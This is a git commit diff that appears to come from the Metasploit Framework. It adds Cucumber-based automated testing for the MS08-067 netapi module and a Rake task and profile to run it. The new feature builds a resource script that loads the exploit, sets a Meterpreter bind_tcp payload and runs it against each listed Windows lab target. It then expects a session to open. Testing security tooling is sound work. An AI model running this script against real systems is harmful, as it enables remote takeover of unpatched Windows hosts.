working on automated testing of 08-067
darkbushido
parent
be8d6df093
commit
d8a7421a0a
|
|
@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets"
|
|||
%>
|
||||
default: <%= std_opts %> <%= ignored_tags %> features
|
||||
boot: <%= std_opts %> --tags @boot features
|
||||
exploit: <%= std_opts %> --tags @targets features
|
||||
wip: --tags @wip:3 --wip features
|
||||
rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip
|
||||
rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip
|
||||
|
|
@ -1,181 +1,26 @@
|
|||
@wip
|
||||
@targets
|
||||
Feature: MS08-067 netapi
|
||||
|
||||
Background:
|
||||
Given a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
Given I run `msfconsole` interactively
|
||||
And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
|
||||
|
||||
Scenario: The MS08-067 Module should have the following options
|
||||
When I type "use exploit/windows/smb/ms08_067_netapi"
|
||||
And I type "show options"
|
||||
And I type "exit"
|
||||
Then the output should contain:
|
||||
Scenario: The MS08-067 should get a session with bind_tcp
|
||||
Given I ready the windows targets
|
||||
And a file named "ms08-067.rc" with:
|
||||
"""
|
||||
Module options (exploit/windows/smb/ms08_067_netapi):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOST yes The target address
|
||||
RPORT 445 yes Set the SMB service port
|
||||
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic Targeting
|
||||
|
||||
<ruby>
|
||||
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
|
||||
self.run_single('use exploit/windows/smb/ms08_067_netapi')
|
||||
self.run_single('set payload windows/meterpreter/bind_tcp')
|
||||
hosts['windows'].each do |host|
|
||||
self.run_single("set RHOST #{host['ip']}")
|
||||
self.run_single('run')
|
||||
sleep 1
|
||||
end
|
||||
|
||||
</ruby>
|
||||
"""
|
||||
|
||||
Scenario: The MS08-067 Module should have the following advanced options
|
||||
When I type "use exploit/windows/smb/ms08_067_netapi"
|
||||
And I type "show advanced"
|
||||
And I type "exit"
|
||||
Then the output should contain:
|
||||
"""
|
||||
Module advanced options:
|
||||
|
||||
Name : CHOST
|
||||
Current Setting:
|
||||
Description : The local client address
|
||||
|
||||
Name : CPORT
|
||||
Current Setting:
|
||||
Description : The local client port
|
||||
|
||||
Name : ConnectTimeout
|
||||
Current Setting: 10
|
||||
Description : Maximum number of seconds to establish a TCP connection
|
||||
|
||||
Name : ContextInformationFile
|
||||
Current Setting:
|
||||
Description : The information file that contains context information
|
||||
|
||||
Name : DCERPC::ReadTimeout
|
||||
Current Setting: 10
|
||||
Description : The number of seconds to wait for DCERPC responses
|
||||
|
||||
Name : DisablePayloadHandler
|
||||
Current Setting: false
|
||||
Description : Disable the handler code for the selected payload
|
||||
|
||||
Name : EnableContextEncoding
|
||||
Current Setting: false
|
||||
Description : Use transient context when encoding payloads
|
||||
|
||||
Name : NTLM::SendLM
|
||||
Current Setting: true
|
||||
Description : Always send the LANMAN response (except when NTLMv2_session is
|
||||
specified)
|
||||
|
||||
Name : NTLM::SendNTLM
|
||||
Current Setting: true
|
||||
Description : Activate the 'Negotiate NTLM key' flag, indicating the use of
|
||||
NTLM responses
|
||||
|
||||
Name : NTLM::SendSPN
|
||||
Current Setting: true
|
||||
Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow
|
||||
authentification on windows Seven/2008r2 when SPN is required
|
||||
|
||||
Name : NTLM::UseLMKey
|
||||
Current Setting: false
|
||||
Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key
|
||||
when the LM response is sent
|
||||
|
||||
Name : NTLM::UseNTLM2_session
|
||||
Current Setting: true
|
||||
Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a
|
||||
NTLMv2_session
|
||||
|
||||
Name : NTLM::UseNTLMv2
|
||||
Current Setting: true
|
||||
Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key
|
||||
is true
|
||||
|
||||
Name : Proxies
|
||||
Current Setting:
|
||||
Description : A proxy chain of format type:host:port[,type:host:port][...]
|
||||
|
||||
Name : SMB::ChunkSize
|
||||
Current Setting: 500
|
||||
Description : The chunk size for SMB segments, bigger values will increase
|
||||
speed but break NT 4.0 and SMB signing
|
||||
|
||||
Name : SMB::Native_LM
|
||||
Current Setting: Windows 2000 5.0
|
||||
Description : The Native LM to send during authentication
|
||||
|
||||
Name : SMB::Native_OS
|
||||
Current Setting: Windows 2000 2195
|
||||
Description : The Native OS to send during authentication
|
||||
|
||||
Name : SMB::VerifySignature
|
||||
Current Setting: false
|
||||
Description : Enforces client-side verification of server response signatures
|
||||
|
||||
Name : SMBDirect
|
||||
Current Setting: true
|
||||
Description : The target port is a raw SMB service (not NetBIOS)
|
||||
|
||||
Name : SMBDomain
|
||||
Current Setting: .
|
||||
Description : The Windows domain to use for authentication
|
||||
|
||||
Name : SMBName
|
||||
Current Setting: *SMBSERVER
|
||||
Description : The NetBIOS hostname (required for port 139 connections)
|
||||
|
||||
Name : SMBPass
|
||||
Current Setting:
|
||||
Description : The password for the specified username
|
||||
|
||||
Name : SMBUser
|
||||
Current Setting:
|
||||
Description : The username to authenticate as
|
||||
|
||||
Name : SSL
|
||||
Current Setting: false
|
||||
Description : Negotiate SSL for outgoing connections
|
||||
|
||||
Name : SSLCipher
|
||||
Current Setting:
|
||||
Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
|
||||
|
||||
Name : SSLVerifyMode
|
||||
Current Setting: PEER
|
||||
Description : SSL verification method (Accepted: CLIENT_ONCE,
|
||||
FAIL_IF_NO_PEER_CERT, NONE, PEER)
|
||||
|
||||
Name : SSLVersion
|
||||
Current Setting: SSL3
|
||||
Description : Specify the version of SSL that should be used (Accepted: SSL2,
|
||||
SSL3, TLS1)
|
||||
|
||||
Name : VERBOSE
|
||||
Current Setting: false
|
||||
Description : Enable detailed status messages
|
||||
|
||||
Name : WORKSPACE
|
||||
Current Setting:
|
||||
Description : Specify the workspace for this module
|
||||
|
||||
Name : WfsDelay
|
||||
Current Setting: 0
|
||||
Description : Additional delay when waiting for a session
|
||||
"""
|
||||
|
||||
@targets
|
||||
Scenario: Show RHOST/etc variable expansion from a config file
|
||||
When I type "use exploit/windows/smb/ms08_067_netapi"
|
||||
When RHOST is WINDOWS
|
||||
And I type "set PAYLOAD windows/meterpreter/bind_tcp"
|
||||
And I type "show options"
|
||||
And I type "run"
|
||||
And I type "exit"
|
||||
And I type "exit"
|
||||
Then the output should match /spider-wxp/
|
||||
When I run `msfconsole --environment test -q -r ms08-067.rc -x exit`
|
||||
Then the output should contain "[*] Exploit completed, 1 session was created."
|
||||
|
|
|
|||
|
|
@ -1,2 +1,7 @@
|
|||
WINDOWS: spider-wxp.vuln.lax.rapid7.com
|
||||
LINUX: spider-ubuntu.vuln.lax.rapid7.com
|
||||
windows:
|
||||
-
|
||||
hostname: wxpsp0
|
||||
ip: 127.0.0.100
|
||||
-
|
||||
hostname: wxpsp2
|
||||
ip: 127.0.0.101
|
||||
|
|
|
|||
|
|
@ -12,6 +12,12 @@ begin
|
|||
t.fork = true # You may get faster startup if you set this to false
|
||||
t.profile = 'boot'
|
||||
end
|
||||
Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
|
||||
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
|
||||
t.fork = true # You may get faster startup if you set this to false
|
||||
t.profile = 'exploit'
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
rescue LoadError
|
||||
|
|
|
|||
Loading…
Reference in New Issue